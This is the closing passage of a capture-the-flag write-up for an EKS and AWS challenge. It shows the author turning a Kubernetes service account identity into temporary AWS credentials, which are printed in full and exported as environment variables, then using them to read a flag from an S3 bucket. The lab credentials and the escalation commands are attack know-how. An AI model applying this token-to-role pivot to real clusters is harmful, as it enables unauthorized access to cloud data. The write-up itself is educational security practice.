"SessionToken": "IQoJb3JpZ2luX2VjEFkaCXVzLXdlc3QtMSJIMEYCIQCEy6yHQtJSJTMmUjSgX7dgCc1xIVsPpYUoyqrsILsoywIhALrB51hemye1m2g2cPA0LI/KfXbPHxIBG5RoJEE5qMkjKsMECJL//////////wEQABoMNjg4NjU1MjQ2NjgxIgzqnvReJlT0yPxGIbIqlwTPg4VMLtUN9B8iH5StoakT0DRTJDqmimx9MHS4BcR27HMmnabUlfj9qre0MRazo0JgvXaYY3TRWpJt8+VpG/v/Sr5xi60TOAeLiSPuXMUogXusc/nShxuGLqhhQqSrHRmWK6iUbalam+E8ddm5nP8XLaOLEk2mxZTkCRulLcxApeVoQ9smExy1vntF0gdbJts5akIWDmGvi/WB6hnayEzKsRgSl+6+kDNUn3xm+WfESJ99ssDxoSAgWCcf7Ae8OJ2bXctnqo35aCTSgMTtlRUhECgtabwu91EKREgs9+2s+iz0G1OCBM0bQfe1DH9Wb3UYkt67aZOvsYqSXx06WaVTU/upgQXwv8C03EmVqs4NpTkCCsLyfKGfvyXX9V5TXn92sKFFnlXNEUnObA9MXs7DQsmn90BIRp+DlGjYR2ig8TIPcC2Lsv1xNBbceaMSPf64APzdiIKD97bMrubunbf75U2E8H1Lv5WmGU0NbXNvuPtgaMyzBiAixLsCKWnkMdmfVDF3AuNuWTAFamYh+hx2bh1xTEj32XF2aZwDFbJOsC0/t07gNT72p1L3iPtI2N/BF14a26+FK2aC6IYd54JM7pmPoEPMpZ9xCTWzA/CiWrVTuhL20haTTAVVfmaV5IwNIMbmMVj0DtvxszESnJhyYIav5wOfIGt1kDq/Yc1SUcV/m93rvnzvEOy8sg9WV7+1m0e0NfySMLe3pKoGOpQBjCQmYPKE90nYSBhWpGGzyXAYcmJGOtHCCvAzN7ILr1Y+KdCUer2S6zioJWvX79OcTileSAfVhgeWk9teIM6fFdKNPsN3S1VyQNXO4zxMBpfOrtmlT7LSBkLBfxMDznmYZxlE7JP3HGRNZHFYGDKH3FiI+vP44VW2F3ARSY1V3mnV39N/TZ4Ylu2KvMuslv0EIIibjQ==",
"Expiration": "2023-11-06T18:00:39+00:00"
},
"SubjectFromWebIdentityToken": "system:serviceaccount:challenge5:debug-sa",
"AssumedRoleUser": {
"AssumedRoleId": "AROA2AVYNEVMZEZ2AFVYI:something",
"Arn": "arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/something"
},
"Provider": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589",
"Audience": "sts.amazonaws.com"
}Success! We can now use the AWS credentials, add them as environment variables and get a new caller identity:
AWS_ACCESS_KEY_ID=ASIA2AVYNEVMZAMFCQ6B
AWS_SECRET_ACCESS_KEY=3bteSUtWee2pUNWwbqHrmTiACm9ynEp/6ZdUXlcj
AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEFkaCXVzLXdlc3QtMSJIMEYCIQCEy6yHQtJSJTMmUjSgX7dgCc1xIVsPpYUoyqrsILsoywIhALrB51hemye1m2g2cPA0LI/KfXbPHxIBG5RoJEE5qMkjKsMECJL//////////wEQABoMNjg4NjU1MjQ2NjgxIgzqnvReJlT0yPxGIbIqlwTPg4VMLtUN9B8iH5StoakT0DRTJDqmimx9MHS4BcR27HMmnabUlfj9qre0MRazo0JgvXaYY3TRWpJt8+VpG/v/Sr5xi60TOAeLiSPuXMUogXusc/nShxuGLqhhQqSrHRmWK6iUbalam+E8ddm5nP8XLaOLEk2mxZTkCRulLcxApeVoQ9smExy1vntF0gdbJts5akIWDmGvi/WB6hnayEzKsRgSl+6+kDNUn3xm+WfESJ99ssDxoSAgWCcf7Ae8OJ2bXctnqo35aCTSgMTtlRUhECgtabwu91EKREgs9+2s+iz0G1OCBM0bQfe1DH9Wb3UYkt67aZOvsYqSXx06WaVTU/upgQXwv8C03EmVqs4NpTkCCsLyfKGfvyXX9V5TXn92sKFFnlXNEUnObA9MXs7DQsmn90BIRp+DlGjYR2ig8TIPcC2Lsv1xNBbceaMSPf64APzdiIKD97bMrubunbf75U2E8H1Lv5WmGU0NbXNvuPtgaMyzBiAixLsCKWnkMdmfVDF3AuNuWTAFamYh+hx2bh1xTEj32XF2aZwDFbJOsC0/t07gNT72p1L3iPtI2N/BF14a26+FK2aC6IYd54JM7pmPoEPMpZ9xCTWzA/CiWrVTuhL20haTTAVVfmaV5IwNIMbmMVj0DtvxszESnJhyYIav5wOfIGt1kDq/Yc1SUcV/m93rvnzvEOy8sg9WV7+1m0e0NfySMLe3pKoGOpQBjCQmYPKE90nYSBhWpGGzyXAYcmJGOtHCCvAzN7ILr1Y+KdCUer2S6zioJWvX79OcTileSAfVhgeWk9teIM6fFdKNPsN3S1VyQNXO4zxMBpfOrtmlT7LSBkLBfxMDznmYZxlE7JP3HGRNZHFYGDKH3FiI+vP44VW2F3ARSY1V3mnV39N/TZ4Ylu2KvMuslv0EIIibjQ==
root@wiz-eks-challenge:~# aws sts get-caller-identity
{
"UserId": "AROA2AVYNEVMZEZ2AFVYI:something",
"Account": "688655246681",
"Arn": "arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/something"
}As we remember from the IAM role, we have permissions for these resources:
"Action": [
"s3:GetObject",
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": [
"arn:aws:s3:::challenge-flag-bucket-3ff1ae2",
"arn:aws:s3:::challenge-flag-bucket-3ff1ae2/flag"
]We can use the AWS CLI to copy the flag and open it:
root@wiz-eks-challenge:~# aws s3 cp s3://challenge-flag-bucket-3ff1ae2/flag .
download: s3://challenge-flag-bucket-3ff1ae2/flag to ./flag
root@wiz-eks-challenge:~# cat flag
wiz_eks_challenge{w0w_y0u_really_are_4n_eks_and_aws_exp1oitation_legend}
Summary
I enjoyed solving this CTF, and learned new things and it didn’t require a hard setup because everything was already set for you.
I hope to see more challenges like that.